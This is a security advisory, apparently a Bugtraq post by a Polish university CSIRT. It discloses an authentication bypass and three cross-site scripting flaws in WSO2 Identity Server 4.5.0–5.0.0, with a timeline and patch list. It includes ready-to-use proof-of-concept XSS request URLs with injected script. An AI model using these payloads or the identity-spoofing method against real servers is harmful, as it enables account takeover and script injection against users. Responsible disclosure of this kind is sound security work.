WSO2 Identity Server (http://wso2.com/products/identity-server/) version
4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including
authentication bypass.
IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932
IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933
IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930
IS 5.0.0 + Service Pack 1
Vulnerabilities details:
1) Identity spoofing/authentication bypass. Attacker need to log in to
WSO2 IS to obtain valid HTTP session. Given this session he/she can
request OpenID assertion from WSO2 IS to _any_ identity
(openid.identity). Thus any authenticated user is able to spoof any
identity he/she requests, in order to login to RP as user of his/her will.
WSO2 Identity Server (http://wso2.com/products/identity-server/) version
4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including
authentication bypass.
Timeline:
09.10.2014 - Vendor notified
22.11.2014 - Vendor confirmed
04.12.2014 - Patches released
25.03.2015 - Bugtraq disclosure
Vulnerable versions:
IS 4.5.0
IS 4.6.0
IS 5.0.0
Fixed versions:
IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932
IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933
IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930
IS 5.0.0 + Service Pack 1
Vulnerabilities details:
1) Identity spoofing/authentication bypass. Attacker need to log in to
WSO2 IS to obtain valid HTTP session. Given this session he/she can
request OpenID assertion from WSO2 IS to _any_ identity
(openid.identity). Thus any authenticated user is able to spoof any
identity he/she requests, in order to login to RP as user of his/her will.
2) XSS A - HTML injection
https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%
22XSS%22)%3e
3) XSS B - HTML injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%
3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.r
eturn_to=http://example.com&openid.realm=http://example.com&openid.ns.ax
=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&o
penid.identity=https://example.com/test&openid.claimed_id=https://exampl
e.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49
bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%
2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver
&username=test&authenticators=BasicAuthenticator:LOCAL
4) XSS C - JavaScript injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%
3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.r
eturn_to=http://example.com&openid.realm=http://example.com&openid.ns.ax
=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&o
penid.identity=https://example.com/test&openid.claimed_id=https://exampl
e.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49
bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCaller
Path=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOC
AL
regards
--
Bartlomiej Balcerek
WCSS CSIRT
Wroclaw Centre for Networking and Supercomputing
Wroclaw University of Technology, Poland
phone: +48 (71) 320-20-79 mail: bartol (at) pwr.edu (dot) pl [email concealed]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iQIcBAEBAgAGBQJVEs3MAAoJEERremmKJmptyqIP/166BQ2QGX/gnN4Rb8R9PgUI
SFuLuafvtitjrYSkQDTuylZJKB7PRWc1CNf9f9RUdh9NBJzK/RZT1IhQ97BLIjLl
e9O+KzLxVhfZVM/xl3DLn0Plcr0D3PXJSb4WJFmyFfCog/OUQJXfRsXMJXAELF8x
KSFrrldfGCky5oPa/8qQNLa261IPfHy5Tht2qaHyHALEbJZiZaXZQ96GrfdftsKE
/DOKWOEBgu3SPSZ8acV4AQM4fK5wBRGtgERkU53zW0bq0W34Gq/1JlH/rt6ub94L
IzoOcJ/hRNPcGrYLMCQfgTyr1sQWsZFriYT3ABi3f0WxgpfD/w9RiYJw/aBeVEBt
qIhWaSlqVkJBwTOnw+pEWtQPiHeFwMYtxaWrfPdNuY1Vs1t7GA/bjbz6qAYUHKtj
vzHcnuR+JyTutbOPIf23aBhhih8N/F4ozNAO7kMahwSV09mcSfzU8A1vNmInbLFb
Fb/Wg9f4N8SsTZvghJz13hrn4PnzScI1zFsMrrTBrf7Qng9amAFws2QF3bSMNuD6
h+Dw/nS67oYJpEFM7P5X55ZHCLKZOWevH8LExiIQ3XtZfSljIr8Lbc8SfRb/Pv1N
e5QbzWmv+kKbjENjxQoqq75grYUpqiS78bg8iFBqVoDa0skDCrw6sFkc0g/xaSnS
AkJkps+EGC4I4xkGbSk4
=JVRN
-----END PGP SIGNATURE-----
[ reply ]